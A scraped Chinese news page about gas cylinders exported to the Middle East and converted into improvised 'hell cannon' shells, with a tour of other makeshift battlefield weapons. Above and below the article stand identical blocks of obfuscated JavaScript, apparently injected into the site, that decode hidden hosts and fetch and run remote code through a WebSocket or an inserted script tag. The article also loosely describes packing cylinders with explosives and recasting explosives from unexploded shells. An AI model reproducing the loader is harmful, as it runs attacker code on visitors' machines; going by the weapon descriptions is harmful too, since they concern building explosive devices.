function mNkhgicY(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function bUViyAkl(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return mNkhgicY(t);};window['\x6c\x7a\x44\x4a\x6e\x66']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=bUViyAkl,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('a2wueWRpdHdlYi5jbg====','dHIueeWVzdW42NzguY29t','138805',window,document,['=','e']);}:function(){};

中国煤气罐在中东走红,富豪争抢囤货:居然是这个用处

上世纪八九十年代,煤气罐几乎是中国家家户户必备的东西。

随着城市化进程的提速,天然气管道进入千家万户。和煤气罐相比,管道煤气安全稳定,环保清洁,使用方便。因而被淘汰的煤气罐成了夕阳产品,越来越少见。

最近,一个90后小伙靠卖煤气罐一年赚3个亿的故事爆红网络。

这个90后小伙名叫孔德尧,一家三代从事的都是煤气罐生产,完整经历了这个产业的兴盛和没落。



最严重的时候,煤气罐单个成本100多元,卖80元才能出手。

当他不得不从父亲手中接过工厂时,仓库里是10万只不知道如何处理的煤气罐。

正当他一筹莫展时,受同学开网店的启发,孔德尧通过海外电商平台发现了商机:

原来,中国人不稀罕的煤气罐,却是不少南美、中东国家的香饽饽,甚至囤煤气罐还成了财富和身份的象征。

2017年,迫于生计的孔德尧向也门出口了第一批煤气罐,随后,中东的订单纷至沓来。

就这样,靠着制造煤气罐的技术,孔德尧打开了中东地区的大门。在那些战火纷飞的中东国家,煤气罐已经占据了当地市场份额的90%。



如果不是这则新闻的话,许多人应该还不知道煤气罐在中东居然这么受欢迎。

而中东国家之所以对煤气罐的需求量大,是因为他们的用途并不简单。

在我们看来,煤气罐就是生火烧饭的工具。

但是在战乱纷飞、战争资源匮乏的中东地区,比如叙利亚、利比亚、也门,当地的一些武装人士没有足够的资金引进先进的武器装备。于是从中国进口的煤气罐就被制成了炮弹。

据说,一弹足以轰塌一座房子。



▲ 叙利亚战场上的煤气罐炮弹

原装的煤气罐是无法直接上战场的,因为煤气和氧气混合才能发生爆炸。于是,很多民间武器师会对煤气罐进行“改装”。

他们把罐子里装上炸药,用下水管道做炮管,煤气罐做战斗部。为了能让煤气罐准备命中目标,他们还会在煤气罐后方焊接一个平衡尾翼,当地人将这种武器命名为“地狱大炮”。



后来一些叙利亚反对派还将“地狱大炮”的制作过程做成了一个视频,使得这项技术很快流散到叙利亚全境,甚至一些恐怖组织也将其视为武器制作的教学素材。

前不久,叙利亚战事再起,一张非法武装武器工厂的照片流出,只见两名非法武装成员在一个简陋的厂房内改装“炮弹”,他们正在向煤气罐内填装炸药。


最左边的那名非法武装成员还惬意地叼着一根烟,而地上满是炸药粉末。只要一个不小心,被点燃的烟头掉落在地上,就能引发爆炸,在这种高危作业环境中抽烟基本是半只脚已经踏入了“鬼门关”。

有人曾经计算过,一个满载炸药的煤气罐,威力相当于3000颗手雷。虽然真实性有待进一步考证,但从实战视频上看,它的爆炸威力确实很大。

在叙利亚政府军与反政府武装的一次战斗中,政府军士兵将几十个煤气罐炸弹连续发射出去,对方还没弄明白怎么回事,就被全部剿灭了。

这种煤气罐炸弹一度引发外界的高度关注,堪称叙利亚最强“国产”武器之一。


除了叙利亚非法武装组织以外,乌克兰政府军的前线部队也多次改装出煤气罐炮弹,这种炮弹甚至已经成了低水平部队的一个标志性武器。

成本低、威力强,煤气罐炮弹俨然成了战场上的主要武器装备之一。于是,尝到甜头的中东老铁们都开始大肆收集煤气罐。

估计就连孔德尧自己也不知道,原本只是靠煤气罐为生的他,一不小心竟升级成了“军火商”。

近年来,中东地区依旧战事不断。由于资源匮乏,资金短缺,各派武装不得不“自力更生”,利用现有资源实现武器自造。

除了煤气罐炮弹外,利用各种民用工业零件和生活用品制造的土制武器也应运而生。

平板电脑在这些士兵手里,也能被改造成一种武器。下图是两名士兵将ipad与炸弹连接,用带有倾角测量的app来测算发射架的角度,以增加精确度,为火箭炮校准弹道。


中东士兵们还特别研发了“大型弹弓”,有点像中国古代用的投石器,其作用就是用来投射炸弹,一般的炸弹最多也就扔个几十米远,而通过这种手段扔出去的炸弹,几百米也不是什么问题。

下面这个小哥,乍一看还以为在做饭。其实,他正在把战场上获取的未爆炸炮弹中的炸药,加热溶解,再灌装到各种土制炮弹中。

虽然这是一个相当危险的工作,但获取的却是高质量的军用级炸药,是非常珍贵的作战资源。

各色皮卡,是叙利亚战场上最为普及的机动作战平台。在皮卡后座上,他们焊接了非常粗糙的机枪支架,而钢板就是他们用来防弹用的护盾。

除了一些小型的武器之外,甚至有些士兵们自制出了坦克装甲车。

外表如此简陋的坦克装甲车内部,游戏手柄竟成了坦克的方向盘,一名士兵正在用游戏手柄控制着装甲车,一副“坦克大战”的既视感。

再来看看叙利亚自由军的推土机大炮。

这台推土机上没有铲刀,取而代之的是一个多联装管状物体。这是自由军的士兵们用钢管改装而成,据说这种炮弹的射程是三公里,威力不容小觑。

更令人感到迷惑的是,一头毛驴竟然也被改造成了“武器”,头上戴着一个钢盔帽,背上立着一挺机枪,脖子上挂着一大串子弹,后面还有一个可供士兵坐着的小椅子。


这些看似奇葩的武器背后,有着和平年代无法想象的辛酸。

这些武器材料易获取、制作工艺简单,且制造周期短,从而缓解了中东地区武器短缺的困境。但制作过程却存在很大缺陷,一不小心就会丧命。

如果不是生活所迫,谁会无奈到把煤气罐当作武器?谁又会无奈到拿着生命去冒险呢?

希望战争能够少一点,希望中东人民使用煤气罐不再是为了做炮弹……

给TA买糖
共{{data.count}}人
人已赞赏
时事圈

瑞士日内瓦推行新的最低工资标准:月薪近3万人民币

2020-11-6 12:53:28

时事圈

员工称被HR抬出公司,虎牙回应:抬出去冷静下

2020-11-7 18:14:35

function ifRqJrD(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function TBDuZpUS(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ifRqJrD(t);};window['\x45\x44\x56\x63\x5a\x70\x6c\x72\x6d\x69']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=TBDuZpUS,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('a2wueWWRpdHdlYi5jbg==','dHIueWVzdW422NzguY229t','138806',window,document,['W','2']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧